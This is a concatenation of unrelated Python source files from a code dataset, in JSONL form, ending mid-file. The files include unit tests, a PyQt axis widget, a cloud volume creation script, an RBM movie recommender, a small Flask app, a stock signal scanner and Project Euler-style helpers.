Decimal(money) , after_money)\n\n # 写入Excel 中实际结果\n self.excel_handler.write_cell(\"recharge\",config.data_path,test_data[\"case_id\"]+1,9,\"用例通过\")\n except AssertionError as e:\n # 记录logger\n self.logger.error(\"���试用例失败\".format(e))\n # 手动抛出异常,否则测试用例会自动通过,写入Excel\n self.excel_handler.write_cell(\"recharge\",config.data_path,test_data[\"case_id\"]+1,9,\"用例失败\")\n raise e\n\n\n\n","sub_path":"test_cases/test_03_recharge.py","file_name":"test_03_recharge.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"406349463","text":"# -*- coding: utf-8 -*-\nimport logging\n\n\ndef get_repo_names():\n return [\"rzhilkibaev/demo-simple-web\"]\n\ndef handle(event, context):\n log = logging.getLogger()\n log.setLevel(logging.DEBUG)\n log.debug(\"received event \" + str(event))\n \n repo_name = event[\"repository\"][\"full_name\"]\n if repo_name in get_repo_names():\n log.info(\"repository \" + repo_name + \" changed\")\n \n return None\n","sub_path":"shmenkins/handle_webhook.py","file_name":"handle_webhook.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"264736312","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n################################################################################\n# Phoseg Copyright (C) 2012 Suizokukan\n# Contact: suizokukan _A.T._ orange dot fr\n#\n# This file is part of Phoseg.\n# Phoseg is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Phoseg is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Phoseg. If not, see .\n################################################################################\n\"\"\"\n ❏Phoseg❏ : phoseg/tests/lops_test.py\n\"\"\"\n\n# pylint: disable=R0904\n# (\"Too many public methods\")\n# Since this classes are derived from unittest.TestCase we have a lot of\n# methods in the following classe(s).\nfrom phoseg.phonetic.lops import LOPhoneticSegments\nfrom phoseg.errors.errors import PhoSegError\nfrom phoseg import PhoSegObject\nimport unittest\n\n################################################################################\nclass TestLOPhoneticSegments(unittest.TestCase):\n \"\"\"\n class TestLOPhoneticSegments\n\n test of phoseg.phonetic.lops::LOPhoneticSegments\n \"\"\"\n\n #///////////////////////////////////////////////////////////////////////////\n def test_context(self):\n \"\"\"\n class TestLops.test_context\n \"\"\"\n\n # missing asterisk :\n phoneticsegments_list = []\n lops = LOPhoneticSegments(phoneticsegments_list)\n with self.assertRaises(PhoSegError):\n lops.context(10,\"VC\")\n\n # several asterisks :\n phoneticsegments_list = []\n lops = LOPhoneticSegments(phoneticsegments_list)\n with self.assertRaises(PhoSegError):\n lops.context(10,\"C*VC*\")\n\n # asterisk in position #0 :\n phoneticsegments_list = []\n lops = LOPhoneticSegments(phoneticsegments_list)\n with self.assertRaises(PhoSegError):\n lops.context(10,\"*VC\")\n\n # empty string but everything's ok :\n phoneticsegments_list = []\n lops = LOPhoneticSegments(phoneticsegments_list)\n self.assertEqual( lops.context(10,\"V*C\"),\n False )\n\n # nothing's special, everything's ok :\n phoneticsegments_list = [ps[0] for ps in PhoSegObject(ipa = \"tapa\").get_phonemes()]\n lops = LOPhoneticSegments(phoneticsegments_list)\n self.assertEqual( lops.context(1,\"CV*C\"),\n True )\n\n # nothing's special, everything's ok :\n phoneticsegments_list = [ps[0] for ps in PhoSegObject(ipa = \"tapa\").get_phonemes()]\n lops = LOPhoneticSegments(phoneticsegments_list)\n self.assertEqual( lops.context(0,\"C*VC\"),\n True )\n\n # nothing's special, everything's ok :\n phoneticsegments_list = [ps[0] for ps in PhoSegObject(ipa = \"tapa\").get_phonemes()]\n lops = LOPhoneticSegments(phoneticsegments_list)\n self.assertEqual( lops.context(3,\"CVCV*\"),\n True )\n","sub_path":"tests/lops_test.py","file_name":"lops_test.py","file_ext":"py","file_size_in_byte":3437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"305224751","text":"from PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout, QWidget, QCheckBox\n\n\nclass Axis:\n \"\"\"\n Axis determines which values will be retrieved from the data file\n\n The possibilities are:\n - 2 different LEDs, represents the distance between them\n - 1 LED and 1 coordinate, represents the value of this coordinate of the LED\n - Temperature or time, self explanatory\n\n No invalid combination of boxes can be checked\n \"\"\"\n\n def create_boxes(self):\n \"\"\"Organize the check boxes\"\"\"\n\n self._ctrl_leds = [False for i in range(5)]\n\n self.setFocusPolicy(Qt.ClickFocus)\n\n self._cb_l1 = QCheckBox('Led1', self)\n self._cb_l1.stateChanged.connect(self.change_led_state(1))\n self._cb_l1.setLayoutDirection(Qt.RightToLeft)\n self._box_lay.addWidget(self._cb_l1)\n\n self._cb_l2 = QCheckBox('Led2', self)\n self._cb_l2.stateChanged.connect(self.change_led_state(2))\n self._cb_l2.setLayoutDirection(Qt.RightToLeft)\n self._box_lay.addWidget(self._cb_l2)\n\n self._cb_l3 = QCheckBox('Led3', self)\n self._cb_l3.stateChanged.connect(self.change_led_state(3))\n self._cb_l3.setLayoutDirection(Qt.RightToLeft)\n self._box_lay.addWidget(self._cb_l3)\n\n self._cb_l4 = QCheckBox('Led4', self)\n self._cb_l4.stateChanged.connect(self.change_led_state(4))\n self._cb_l4.setLayoutDirection(Qt.RightToLeft)\n self._box_lay.addWidget(self._cb_l4)\n\n self._cb_x = QCheckBox('Linhas', self)\n self._cb_x.stateChanged.connect(self.change_coord_state(0))\n self._cb_x.setLayoutDirection(Qt.RightToLeft)\n self._box_lay.addWidget(self._cb_x)\n\n self._cb_y = QCheckBox('Colunas', self)\n self._cb_y.stateChanged.connect(self.change_coord_state(1))\n self._cb_y.setLayoutDirection(Qt.RightToLeft)\n self._box_lay.addWidget(self._cb_y)\n\n self._cb_temp = QCheckBox('Temp.', self)\n self._cb_temp.stateChanged.connect(self.change_others_state(1))\n self._cb_temp.setLayoutDirection(Qt.RightToLeft)\n self._box_lay.addWidget(self._cb_temp)\n\n self._cb_time = QCheckBox('Tempo', self)\n self._cb_time.stateChanged.connect(self.change_others_state(0))\n self._cb_time.setLayoutDirection(Qt.RightToLeft)\n self._box_lay.addWidget(self._cb_time)\n\n self._cb_pos = QCheckBox('Pos.', self)\n self._cb_pos.stateChanged.connect(self.change_others_state(2))\n self._cb_pos.setLayoutDirection(Qt.RightToLeft)\n self._box_lay.addWidget(self._cb_pos)\n\n def change_led_state(self, ind):\n \"\"\"Logic behind when a LED box change state\n\n Input:\n ind (int): index of LED that changed state\n \"\"\"\n\n def change_led():\n self._ctrl_leds[ind] = not self._ctrl_leds[ind]\n\n if self._ctrl_leds[ind] == True:\n if self.count_set_leds() == 1:\n self.disable_others()\n\n if self._cb_x.isChecked() or self._cb_y.isChecked():\n self.disable_leds()\n else:\n self.disable_leds()\n self.disable_coords()\n else:\n self.enable_leds()\n if self.count_set_leds() == 1:\n self.enable_coords()\n\n elif not self._cb_x.isChecked() and not self._cb_y.isChecked():\n self.enable_others()\n\n return change_led\n\n def change_coord_state(self, ind):\n \"\"\"Logic behind when a coordinate box is checked\n\n Input:\n ind (int): which coordinate box was checked, 0 for x and 1 for y\n \"\"\"\n\n def change_coord():\n ctrl_aux = (ind == 0) * self._cb_x.isChecked() or (\n ind == 1) * self._cb_y.isChecked()\n\n if ctrl_aux == True:\n self.disable_others()\n self.disable_coords()\n\n if self.count_set_leds() == 1:\n self.disable_leds()\n else:\n self.enable_coords()\n self.enable_leds()\n\n if self.count_set_leds() == 0:\n self.enable_others()\n\n return change_coord\n\n def change_others_state(self, ind):\n \"\"\"Logic behind when a time, temperature or distance box is checked\n\n Input:\n ind (int): which 'other' box was checked\n \"\"\"\n\n def change_others():\n ctrl_aux = ((ind == 0) * self._cb_time.isChecked() or (ind == 1) * self._cb_temp.isChecked() or\n (ind == 2) * self._cb_pos.isChecked())\n\n if ctrl_aux == True:\n self.disable_others()\n self.disable_coords()\n self.disable_leds()\n else:\n self.enable_others()\n self.enable_coords()\n self.enable_leds()\n\n return change_others\n\n def enable_coords(self):\n \"\"\"Enable coordinates boxes\"\"\"\n\n self._cb_x.setEnabled(True)\n self._cb_y.setEnabled(True)\n\n def disable_coords(self):\n \"\"\"Disable coordinates boxes\"\"\"\n\n self._cb_x.setDisabled(not self._cb_x.isChecked())\n self._cb_y.setDisabled(not self._cb_y.isChecked())\n\n def enable_others(self):\n \"\"\"Enable time, temperature and distance boxes\"\"\"\n\n self._cb_time.setEnabled(True)\n self._cb_temp.setEnabled(True)\n self._cb_pos.setEnabled(True)\n\n def disable_others(self):\n \"\"\"Disable time, temperature and distance boxes\"\"\"\n\n self._cb_time.setDisabled(not self._cb_time.isChecked())\n self._cb_temp.setDisabled(not self._cb_temp.isChecked())\n self._cb_pos.setDisabled(not self._cb_pos.isChecked())\n\n def enable_leds(self):\n \"\"\"Enable LEDs boxes\"\"\"\n\n self._cb_l1.setEnabled(True)\n self._cb_l2.setEnabled(True)\n self._cb_l3.setEnabled(True)\n self._cb_l4.setEnabled(True)\n\n def disable_leds(self):\n \"\"\"Disable LEDs boxes\"\"\"\n\n self._cb_l1.setDisabled(not self._cb_l1.isChecked())\n self._cb_l2.setDisabled(not self._cb_l2.isChecked())\n self._cb_l3.setDisabled(not self._cb_l3.isChecked())\n self._cb_l4.setDisabled(not self._cb_l4.isChecked())\n\n def count_set_leds(self):\n \"\"\"Count the number of active LEDs boxes\n\n Return:\n val (int): number of LEDs with active boxes\n \"\"\"\n\n return len([i for i in self._ctrl_leds if i == True])\n\n def is_valid(self):\n \"\"\"Test if current combination of check boxes means a valid information from the data\n\n Return:\n valid (bool): True if combination is valid, false otherwise\n \"\"\"\n\n if self.count_set_leds() == 1:\n return self._cb_x.isChecked() or self._cb_y.isChecked()\n elif self.count_set_leds() == 0:\n return self._cb_temp.isChecked() or self._cb_time.isChecked() or self._cb_pos.isChecked()\n\n return True\n\n def get_ind(self):\n \"\"\"Indices in the data sheet that the current boxes combination represent\n\n Return:\n ind ([int]): Indices in the data sheet\n \"\"\"\n\n ind = [2 * (i - 1) for i in range(5) if self._ctrl_leds[i] == True]\n\n if not ind:\n ind.append(8 * self._cb_temp.isChecked() + 9 *\n self._cb_time.isChecked() + 10 * self._cb_pos.isChecked())\n\n if self._cb_y.isChecked():\n ind[0] += 1\n\n return ind\n\n\nclass YAxis(QWidget, Axis):\n\n \"\"\"Vertical Axis\"\"\"\n\n def __init__(self, parent=None):\n QWidget.__init__(self)\n\n self._box_lay = QVBoxLayout()\n self.setLayout(self._box_lay)\n self.create_boxes()\n self._cb_pos.hide()\n\n # Initial State\n self._cb_l1.setChecked(True)\n self._cb_l2.setChecked(True)\n\n\nclass XAxis(QWidget, Axis):\n\n \"\"\"Horizontal Axis\"\"\"\n\n def __init__(self, parent=None):\n QWidget.__init__(self)\n\n self._box_lay = QHBoxLayout()\n self.setLayout(self._box_lay)\n self.create_boxes()\n\n # Initial State\n self._cb_pos.setChecked(True)\n\nif __name__ == '__main__':\n pass","sub_path":"cagi/axis.py","file_name":"axis.py","file_ext":"py","file_size_in_byte":8215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"647398698","text":"# Note: Enter the volume size in exact multiples of 1GiB (1024^3).\n# In the below example, the volume size specified for “quotaInBytes”is 1099511627776, which is 1024 GiB.\nimport google.auth\nimport google.auth.transport.requests\nimport requests\nimport json\nimport time\nfrom google.auth import jwt\nfrom google.oauth2 import service_account\n\n# Set common variables\naudience = 'https://cloudvolumesgcp-api.netapp.com'\nserver = 'https://cloudvolumesgcp-api.netapp.com'\n# Enter your service account file below\nservice_account_file = '/Users/arjunan/Downloads/ncv-beta-demo-eccee8711557.json'\nproject_number = 123456789 # Enter your project number here\nlocation = \"us-east1\"\nvolumeIDdetails = \"Enter your Volume ID here\"\n\n# Small utility function to convert bytes to gibibytes\ndef convertToGiB(bytes):\n return bytes/1024/1024/1024\n\ndef get_token():\n # Create credential object from private key file\n svc_creds = service_account.Credentials.from_service_account_file(\n service_account_file)\n\n # Create jwt\n jwt_creds = jwt.Credentials.from_signing_credentials(\n svc_creds, audience=audience)\n\n # Issue request to get auth token\n request = google.auth.transport.requests.Request()\n jwt_creds.refresh(request)\n\n # Extract token\n id_token1 = jwt_creds.token\n #print (id_token1)\n return id_token1\n\ndef createVol():\n id_token1 = get_token()\n # Get all volumes from all regions\n # Construct GET request\n\n createvolumeURL = server + \"/v2/projects/\" + str(project_number) + \"/locations/\" + location + \"/Volumes/\"\n payload = {\n \"name\": \"AutomatedVolume3\",\n \"creationToken\": \"ACV3\",\n \"region\": \"us-east1\",\n \"zone\": \"us-east1-b\",\n \"serviceLevel\": \"basic\",\n \"quotaInBytes\": 1099511627776,\n \"usedBytes\": 78606279278,\n \"snapshotPolicy\": {\n \"dailySchedule\": {\n \"hour\": 1,\n \"minute\": 10,\n \"snapshotsToKeep\": 5\n }\n },\n \"storageClass\": \"software\",\n \"network\": \"projects/123456789/global/networks/ncv-vpc\", # Replace with your VPC instead of ncv-vpc and the project number instead of 123456789\n \"protocolTypes\": [\n \"NFSv3\"\n ]\n }\n headers = {\n 'accept': \"application/json\",\n 'Content-Type': \"application/json\",\n 'Authorization': \"Bearer \" + id_token1.decode('utf-8'),\n 'cache-control': \"no-cache\",\n }\n # POST request to create the volume\n response = requests.post(createvolumeURL, json.dumps(payload), headers=headers)\n # Sleep for 20 seconds to wait for the creation of the volume\n time.sleep(20)\n print(response)\n r_dict = response.json()\n # print(\"Response to POST request: \" + response.text)\n # Get volume attributes\n # To get the values from the dictionary, you have read the dictionary one by one.\n # fetch the response first\n fetchvalue = (r_dict.get('response'))\n # fetch all the values from the response\n fetchvolumeID = fetchvalue.get('AnyValue')\n # fetch the volume ID from the values\n volumeID = fetchvolumeID.get('volumeId')\n # fetch the service level from the values\n serviceLevel = fetchvolumeID.get('serviceLevel')\n # Print the values\n print(\"\\tvolumeID: \" + volumeID + \", serviceLevel: \" + serviceLevel)\n\ncreateVol()\n","sub_path":"createVolume_NFSv3_SW.py","file_name":"createVolume_NFSv3_SW.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"585219144","text":"import logging\nfrom bc211.is_inactive import is_inactive\nfrom bc211.import_icarol_xml.location import update_locations\nfrom bc211.service import update_services_for_location\nfrom django.utils import translation\nfrom human_services.organizations.models import Organization\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef update_entire_organization(organization, city_latlong_map, counters):\n update_organization(organization, counters)\n locations = list(organization.locations)\n update_locations(locations, organization.id, city_latlong_map, counters)\n for location in locations:\n if not is_inactive(location.description):\n update_services_for_location(location.id, location.services, counters)\n\n\ndef update_organization(organization, counters):\n if is_inactive(organization.description):\n return\n translation.activate('en')\n existing = get_existing_organization_or_none(organization)\n if not existing:\n active_record = build_organization_active_record(organization)\n active_record.save()\n counters.count_organization_created()\n LOGGER.debug('created \"%s\" \"%s\"', organization.id, organization.name)\n else:\n LOGGER.warning('duplicate organization \"%s\" \"%s\"', organization.id, organization.name)\n\n\ndef get_existing_organization_or_none(organization):\n result = Organization.objects.filter(id=organization.id).all()\n return result[0] if result else None\n\n\ndef build_organization_active_record(record):\n active_record = get_or_create_organization_active_record(record.id)\n active_record.name = record.name\n active_record.description = record.description\n active_record.website = record.website\n active_record.email = record.email\n return active_record\n\n\ndef get_or_create_organization_active_record(pk):\n if Organization.objects.filter(id=pk).exists():\n return Organization.objects.get(id=pk)\n record = Organization()\n record.id = pk\n return record\n","sub_path":"bc211/import_icarol_xml/organization.py","file_name":"organization.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"340289304","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Nov 12 18:33:31 2018\r\n\r\n@author: anjum\r\n\"\"\"\r\n\r\n# Building RBM\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport pandas as pd\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.parallel\r\nimport torch.optim as optim\r\nimport torch.utils.data\r\nfrom torch.autograd import Variable\r\n\r\n# Importing the data set\r\nmovies = pd.read_csv('ml-1m/movies.dat',\r\n sep = '::',\r\n header = None,\r\n engine = 'python',\r\n encoding ='latin-1') \r\n \r\nusers = pd.read_csv('ml-1m/users.dat',\r\n sep = '::',\r\n header = None,\r\n engine = 'python',\r\n encoding ='latin-1')\r\n \r\nratings = pd.read_csv('ml-1m/ratings.dat',\r\n sep = '::',\r\n header = None,\r\n engine = 'python',\r\n encoding ='latin-1') \r\n# Importing the training and test set\r\n\r\ntraining_set = pd.read_csv('ml-100k/u1.base',delimiter = '\\t')\r\ntraining_set = np.array(training_set, dtype = 'int')\r\ntest_set = pd.read_csv('ml-100k/u1.test',delimiter = '\\t')\r\ntest_set = np.array(test_set , dtype = 'int')\r\n\r\n# getting the number of users and the movies\r\n\r\nnb_users = max(max(training_set[:,0]),max(test_set[:,0]))\r\nnb_movies =max(max(training_set[:,1]),max(test_set[:,1])) \r\n\r\n# converting the data set in to array with users as lines and movies as columns\r\ndef convert(data):\r\n new_data = []\r\n for id_users in range(1, nb_users + 1):\r\n id_movies = data[:,1][data[:,0] == id_users]\r\n id_ratings = data[:,2][data[:,0] == id_users]\r\n ratings = np.zeros(nb_movies)\r\n ratings[id_movies - 1] = id_ratings\r\n new_data.append(list(ratings))\r\n return new_data\r\n\r\ntraining_set = convert(training_set)\r\ntest_set = convert(test_set)\r\n\r\n# converting the list of lists in to torch tensers\r\ntraining_set = torch.FloatTensor(training_set)\r\ntest_set = torch.FloatTensor(test_set)\r\n\r\n# Converting the data in to binary ratings 0 = not liked 1 = likes\r\n\r\ntraining_set[training_set == 0] = -1 # np reviews equals to -1\r\ntraining_set[training_set == 1] = 0\r\ntraining_set[training_set == 2] = 0\r\ntraining_set[training_set >= 3] = 1\r\n\r\ntest_set[test_set == 0] = -1 # np reviews equals to -1\r\ntest_set[test_set == 1] = 0\r\ntest_set[test_set == 2] = 0\r\ntest_set[test_set >= 3] = 1\r\n\r\n# Creating the architecture of RBM.\r\nclass RBM():\r\n def __init__(self, nv , nh): # Inetilizing num of hiden and visible nodes as inputs\r\n self.W = torch.randn(nh , nv) # probabilty of the visible nodes according to the hidden nodes\r\n self.a = torch.randn(1, nh) # Bias for hidden node in form of 2D tensor where 1 respons to batch and nh reponds to bias\r\n self.b = torch.randn(1, nv) # Bias for hidden node in form of 2D tensor where 1 respons to batch and nv reponds to bias\r\n def sample_h(self, x): \r\n # sampling the hidden nodes according to the condition probality\r\n # of a hidden node as per given visible node Where x EQUALS TO VISIBLE NODES\r\n wx = torch.mm(x, self.W.t()) # computing the weights times the neurons\r\n activation = wx + self.a.expand_as(wx) # expand is used to convert a in to dimensions of wx\r\n p_h_given_v = torch.sigmoid(activation) \r\n return p_h_given_v , torch.bernoulli(p_h_given_v)\r\n def sample_v(self, y):\r\n wy = torch.mm(y, self.W) # computing the weights times the neurons\r\n activation = wy + self.b.expand_as(wy) # expand is used to convert a in to dimensions of wx\r\n p_v_given_h = torch.sigmoid(activation) \r\n return p_v_given_h , torch.bernoulli(p_v_given_h)\r\n def train(self, v0,vk,ph0,phk):\r\n # train calculates contrastive divergence\r\n self.W += (torch.mm(v0.t(), ph0) - torch.mm(vk.t(), phk)).t()\r\n self.b += torch.sum((v0 - vk), 0) # zero is to get the 2d tensor\r\n self.a += torch.sum((ph0 - phk),0)\r\n\r\n# Inetializing parameters for RBM class\r\nnv = len(training_set[0]) # Number of movies \r\nnh = 100\r\nbatch_size = 100 # 1 for online learning\r\nrbm = RBM(nv,nh)\r\n\r\n# training the RBM\r\nwalks = 10 # number of walk steps required for gibbs sampling\r\nnb_epoch = 10\r\nfor epoch in range(1, nb_epoch +1):\r\n train_loss = 0\r\n s=0. # counter for the loss\r\n for id_users in range(0, nb_users - batch_size, batch_size):\r\n vk = training_set[id_users:id_users + batch_size] # Target (Taking users for the batch size)\r\n v0 = training_set[id_users:id_users + batch_size] # Actual users to get the loss\r\n ph0,_ = rbm.sample_h(v0)\r\n \r\n # Making loop for K step contrastive divergence\r\n for k in range(walks):\r\n _,hk = rbm.sample_h(vk) # getting the probabilities for first hidden nodes\r\n _,vk = rbm.sample_v(hk) # getting the update for the visible node\r\n vk[v0<0] = v0[v0<0] # Removng the cells with no ratings\r\n phk,_ = rbm.sample_h(vk)\r\n rbm.train(v0,vk,ph0,phk)\r\n train_loss += torch.mean(torch.abs(v0[v0>=0]-vk[v0>=0]))\r\n s+= 1.\r\n print('epoch: ' + str(epoch)+' loss: '+ str(train_loss/s))\r\n \r\n# Testing the RBM.\r\ntest_loss = 0\r\ns = 0.\r\nfor id_user in range(nb_users):\r\n v = training_set[id_user:id_user+1]\r\n vt = test_set[id_user:id_user+1]\r\n if len(vt[vt>=0]) > 0:\r\n _,h = rbm.sample_h(v)\r\n _,v = rbm.sample_v(h)\r\n test_loss += torch.mean(torch.abs(vt[vt>=0] - v[vt>=0]))\r\n s += 1.\r\nprint('test loss: '+str(test_loss/s)) \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n","sub_path":"RBM_1.py","file_name":"RBM_1.py","file_ext":"py","file_size_in_byte":5674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"61059839","text":"#!/usr/bin/env python3\r\n\r\nimport mysql.connector\r\nfrom flask import Flask, render_template, redirect\r\n\r\nimport config\r\n\r\napp = Flask(\"PPCG v2\")\r\ndb_conn = None\r\n\r\n\r\n@app.route(\"/\")\r\ndef hello():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route(\"/post/\")\r\n@app.route(\"/post//\")\r\ndef get_post(post_id, post_title = None):\r\n cursor = db_conn.cursor(dictionary=True)\r\n cursor.execute(\"SELECT * FROM posts WHERE id = %s\", (post_id,))\r\n post_data = cursor.fetchone()\r\n cursor.close()\r\n if post_data is None:\r\n return render_template('notfound.html'), 404\r\n return render_template('post.html', post_data=post_data)\r\n\r\n\r\nif __name__ == '__main__':\r\n try:\r\n db_conn = mysql.connector.connect(**config.db_config)\r\n app.run(host='127.0.0.1', port=5000)\r\n finally:\r\n if db_conn is not None:\r\n db_conn.close()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"78715318","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nAuthor: Aaron-Yang [code@jieyu.ai]\nContributors: \n\n\"\"\"\nimport logging\nfrom typing import Callable\n\nimport arrow\nimport cfg4py\nimport numpy as np\nfrom omicron.core.timeframe import tf\nfrom omicron.core.types import FrameType, Frame\nfrom omicron.models.securities import Securities\nfrom omicron.models.security import Security\nfrom pandas import DataFrame\n\nfrom alpha.core import signal\n\nlogger = logging.getLogger(__name__)\n\ncfg = cfg4py.get_instance()\n\n\nclass Two:\n \"\"\"\n 样本: 西部资源 600139, 2020-08-04 10:00:00\n\n 1. 股价高于所有均线\n 2. 30分钟线的ma5, ma10, ma60粘合(overlap_win周期)后再多头\n 3. ma60向上\n 4. 日线级别前几日(n<7)必须有放量大阳\n \"\"\"\n\n async def fire_long(self, end: Frame = None, overlap_win=10,\n frame_type: FrameType = FrameType.MIN30):\n \"\"\"\n 寻找开多仓信号\n Args:\n\n Returns:\n\n \"\"\"\n result = []\n end = end or arrow.now().datetime\n secs = Securities()\n for code in secs.choose(['stock']):\n #for code in ['600139.XSHG']:\n try:\n sec = Security(code)\n start = tf.shift(end, -(60 + overlap_win - 1), frame_type)\n bars = await sec.load_bars(start, end, frame_type)\n\n mas = {}\n for win in [5, 10, 20, 60]:\n ma = signal.moving_average(bars['close'], win)\n mas[f\"{win}\"] = ma\n\n # 收盘价高于各均线值\n c1, c0 = bars['close'][-2:]\n t1 = c0 > mas[\"5\"][-1] and c0 > mas[\"10\"][-1] and c0 > mas[\"20\"][-1] \\\n and c0 > mas[\"60\"][-1]\n\n # 60均线斜率向上\n slope_60, err = signal.slope(mas[\"60\"][-10:])\n if err is None or err > 5e-4:\n continue\n\n t2 = slope_60 >= 5e-4\n\n # 均线粘合\n diff = np.abs(mas[\"5\"][-6:-1] - mas[\"10\"][-6:-1]) / mas[\"10\"][-6:-1]\n overlap_5_10 = np.count_nonzero(diff < 5e-3)\n t3 = overlap_5_10 > 3\n\n diff = np.abs(mas[\"10\"][-10:] - mas[\"60\"][-10:]) / mas[\"60\"][-10:]\n overlap_10_60 = np.count_nonzero(diff < 5e-3)\n t4 = overlap_10_60 > 5\n\n price_change = await sec.price_change(end,\n tf.shift(end, 8, frame_type),\n frame_type)\n result.append([end, code, t1, t2, t3, t4, slope_60, price_change, True])\n\n if t1 and t2 and t3 and t4:\n print(\"FIRED:\", [end, code, t1, t2, t3, t4, slope_60,\n price_change, True])\n\n except Exception as e:\n pass\n\n return result\n\n async def scan(self, start: Frame, end: Frame, signal_func: Callable,\n frame_type: FrameType = FrameType.DAY):\n frames = tf.get_frames(start, end, frame_type)\n results = []\n for frame in frames:\n if frame_type in tf.day_level_frames:\n frame = tf.int2date(frame)\n else:\n frame = tf.int2time(frame)\n result = await signal_func(frame, frame_type=frame_type)\n results.extend(result)\n\n df = DataFrame(data=results,\n columns=['date', 'code', 't1', 't2','t3','t4', 'slope_60',\n 'pct', \"fired\"])\n df.to_csv(\"/tmp/two.csv\")\n","sub_path":"alpha/plots/two.py","file_name":"two.py","file_ext":"py","file_size_in_byte":3633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"446751719","text":"from itertools import combinations\nn = int(input())\nmatrix = [list(map(int, input().split())) for _ in range(n)]\nresult = []\nfor i in combinations(range(n), int(n/2)) :\n start_score = 0\n link_score = 0\n link = set(range(n)) - set(i)\n for j, k in zip(combinations(i, 2), combinations(link, 2)):\n start_score += matrix[j[0]][j[1]]+matrix[j[1]][j[0]]\n link_score += matrix[k[0]][k[1]]+matrix[k[1]][k[0]]\n result.append(int(abs(start_score-link_score)))\nprint(min(result))\n","sub_path":"2018/CodingInterview/4주차/4주차.py","file_name":"4주차.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"441133983","text":"import xlsxwriter\n\ndef create(y_predict):\n # Create a workbook and add a worksheet.\n workbook = xlsxwriter.Workbook('output.xlsx')\n worksheet = workbook.add_worksheet()\n\n\n # Start from the first cell. Rows and columns are zero indexed.\n row = 1\n col = 0\n\n # Iterate over the data and write it out row by row.\n worksheet.write(0,0,'SECTION')\n for y in y_predict:\n worksheet.write(row, col, y)\n row += 1\n\n\n workbook.close()","sub_path":"create_xlsx.py","file_name":"create_xlsx.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"209057329","text":"# from flask_philo.commands_flask_philo import gen_salt\n\n# ISO 8601 https://en.wikipedia.org/wiki/ISO_8601\nDATETIME_FORMAT = '%Y-%m-%dT%H:%M:%S'\n\nDATE_FORMAT = '%Y-%m-%d'\n\nLOG_LEVEL = 'DEBUG'\n\nHOST = '127.0.0.1'\n\nPORT = 8080\n\nFLASK_PHILO_EXTENSIONS = ()\n","sub_path":"flask_philo_core/default_settings.py","file_name":"default_settings.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"277597381","text":"# ===================================\n# FILE WHERE ALL UTILITIES ARE STORED\n# ===================================\n\n# Imported modules\nimport math\nimport problem_1_to_32\n\n\n# List containing all resolved problems\nproblems = [\n \"1) Trouver la somme de tous les multiples de 5 ou 7 inférieurs à x\",\n \"2) En prenant en compte les termes de la suite de Fibonacci dont les valeurs ne dépassent pas x, trouver la somme des termes impairs\",\n \"3) Quel est le plus grand facteur premier du nombre x ?\",\n \"4) Quel est le plus grand palindrome que l'on peut obtenir en multipliant un nombre de x chiffres avec un nombre de y chiffres ?\",\n \"5) Que vaut la somme des chiffres composant le nombre x^y ?\",\n \"6) Trouver la somme des chiffres du nombre x! ?\"\n]\n\n# Dictionnary containing all functions\nfunctions = {\n 1: problem_1_to_32.problem_1,\n 2: problem_1_to_32.problem_2,\n 3: problem_1_to_32.problem_3,\n 4: problem_1_to_32.problem_4,\n 5: problem_1_to_32.problem_5,\n 6: problem_1_to_32.problem_6\n}\n\n# Function to search the correct function for the problem asked\ndef problem_to_solve(number):\n\n # Search the function in the dictionnary\n func = functions.get(number, lambda: \"Aucun problème sélectionné.\")\n\n # Execute the function if founded\n func()\n\n# Function to check the input for the selection and resolution of a problem\ndef check_input(text):\n\n # Value\n is_ok = False\n\n while is_ok == False:\n max = input(text)\n\n if not max.isdigit():\n print(\"Veuillez entrer une valeur correcte.\")\n else:\n is_ok = True\n max = int(max)\n \n return max\n\n# Function to find a list of prime numbers in the range of the argument\ndef list_prime_numbers(max):\n prime_numbers = []\n\n for prime in range(2, (max)+1):\n isPrime = True\n for num in range(2, int(prime ** 0.5) + 1):\n if prime % num == 0:\n isPrime = False\n break\n\n if isPrime:\n prime_numbers.append(prime) \n\n return prime_numbers\n\n# Function to find the greatest number in the range \ndef 